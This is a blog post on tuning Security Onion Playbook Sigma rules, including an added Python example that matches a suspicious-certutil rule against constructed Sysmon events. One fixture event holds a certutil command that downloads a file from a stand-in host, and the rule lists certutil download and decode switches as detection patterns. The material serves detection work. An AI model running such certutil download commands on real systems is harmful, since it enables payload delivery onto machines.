🧅Security Onion Playbook SIGMA Rules
It's no secret that the Security Onion team has poured an incredible amount of effort into creating their groundbreaking SO2 platform. With each new release, they raise the bar for defenders everywhere, leaving attackers on their toes.
As a self-proclaimed SIEM aficionado, I default to the Onion every time. The network logging mechanisms, Zeek and Suricata, perform phenomenally, especially in a distributed architecture. But one feature that truly stands out to me is Playbook.
By using Winlogbeat to send Windows event logs (such as Security, Application, PowerShell/Operational, and Sysmon) to the Security Onion Manager, analysts can comb through the data using Playbook SIGMA rules. With almost 500 pre-built SIGMA rules by default, even entry-level analysts can get a great head start.
Of course, like any logging and alerting mechanism, rules will need to be fine-tuned to fit the environment and prevent false positives. But with the help of rule tuning, analysts can quickly highlight which rules are valid and which may need some adjustments.
Check out the example below to see just how powerful rule tuning can be when it comes to highlighting potential threats.

Diving deeper into the Suspicious Certutil Command alert, we can inspect each parsed field and verify that this is indeed malicious. Simply hover over the alert, left-click > Drilldown, and you’ll be taken to the rule of your choosing.
Here we can see that bob has been practicing bad cyber awareness and opened an Excel document that spawned a malicious payload using certutil.

Looking further into Playbook, it’s easy to see just how malleable SIGMA rules are. Tuning the rules is simple and very straightforward. In later blogs, I’ll dive deeper into how to make adjustments and create filters to aid in sifting out false positives.
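As an added example (not code from Security Onion, the Sigma project, or this post), the Python below evaluates a Sigma-style "selection and not filter" rule over constructed Sysmon process-creation records: the selection mirrors a suspicious-certutil detection like the alert above, and the filter block is the tuning that suppresses a hypothetical approved parent process. The rule fields, process paths and user names are assumptions.

```python
# Added example (not Security Onion or Sigma project code): a minimal "selection and
# not filter" matcher. The "filter" block is the tuning: a hypothetical approved parent.
RULE = {
    "title": "Suspicious Certutil Command",
    "detection": {
        "selection": {
            "Image|endswith": "\\certutil.exe",
            "CommandLine|contains": ["-urlcache", "-decode", "-encode"],
        },
        "filter": {"ParentImage|endswith": "\\approved-patcher.exe"},  # hypothetical
        "condition": "selection and not filter",
    },
}

def field_matches(event, key, expected):
    """Sigma field modifiers endswith/contains, case-insensitive; a list is an OR."""
    name, _, modifier = key.partition("|")
    value = str(event.get(name, "")).lower()
    for want in (expected if isinstance(expected, list) else [expected]):
        want = want.lower()
        if modifier == "endswith" and value.endswith(want):
            return True
        if modifier == "contains" and want in value:
            return True
    return False

def block_matches(event, block):
    return all(field_matches(event, k, v) for k, v in block.items())

def rule_matches(event, rule=RULE):
    # Only "selection and not filter" is implemented; no filter excludes nothing.
    det = rule["detection"]
    excluded = "filter" in det and block_matches(event, det["filter"])
    return block_matches(event, det["selection"]) and not excluded

# Constructed Sysmon Event ID 1 (process creation) records, not real telemetry.
EVENTS = [
    {"User": "bob", "Image": "C:\\Windows\\System32\\certutil.exe",
     "ParentImage": "C:\\Program Files\\Microsoft Office\\EXCEL.EXE",
     "CommandLine": "certutil -urlcache -split -f http://example.invalid/p.txt"},
    {"User": "svc_patch", "Image": "C:\\Windows\\System32\\certutil.exe",
     "ParentImage": "C:\\Tools\\approved-patcher.exe",
     "CommandLine": "certutil -urlcache -f http://patch.example.invalid/u.cab"},
    {"User": "alice", "Image": "C:\\Windows\\System32\\certutil.exe",
     "ParentImage": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "certutil -hashfile report.docx SHA256"},
]

def alerting_users(events=EVENTS, rule=RULE):
    return [e["User"] for e in events if rule_matches(e, rule)]
```

Running `alerting_users()` with the tuned rule returns only bob; dropping the filter block also flags the patching account, which is the false positive the tuning removes.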

If you’re having a hard time understanding how to obtain logs from an endpoint or what to use, then don’t worry, I’ve got you covered. Visit my GitHub link below to see some of the packages I put together for sending host logs to Security Onion 2 via Winlogbeat. The package also contains a Sysmon binary and a Sysmon config from Olaf Hartong’s GitHub repository. Also, in a later post I outline what to use to test your logging mechanism to ensure you have the best view of what’s happening in your environment! Happy hunting!
For SIGMA rule tuning, check out my video below to give you some ideas on how best to test your SIGMA rules. Enjoy!!